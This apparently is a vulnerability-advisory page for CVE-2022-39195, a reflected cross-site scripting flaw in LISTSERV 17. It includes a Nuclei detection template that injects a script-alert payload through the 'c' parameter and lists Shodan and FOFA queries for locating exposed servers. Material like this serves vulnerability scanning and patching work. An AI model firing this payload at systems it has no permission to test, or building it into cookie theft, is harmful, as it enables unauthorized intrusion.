CVE-2022-39195: LISTSERV 17 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: LISTSERV 17 | POC: 已公开

漏洞描述

LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: CVE-2022-39195

info:
  name: LISTSERV 17 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
    - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L
    - https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39195
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-39195
    cwe-id: CWE-79
    epss-score: 0.29329
    epss-percentile: 0.96444
    cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lsoft
    product: listserv
    shodan-query:
      - http.html:"LISTSERV"
      - http.html:"listserv"
    fofa-query: body="listserv"
  tags: cve,cve2022,xss,listserv,packetstorm,lsoft

http:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
      - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(document.domain)</script>"
          - "LISTSERV"
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207d476951cd832357c9b15124d1455caa2d8458c79632f8f5b5fd8f685025fd71022100f3a1da9078015d172dfe067b1a63dfa9aefaf893dce509d7dd04a3037045f540:922c64590222798bb761d5b6d8e72950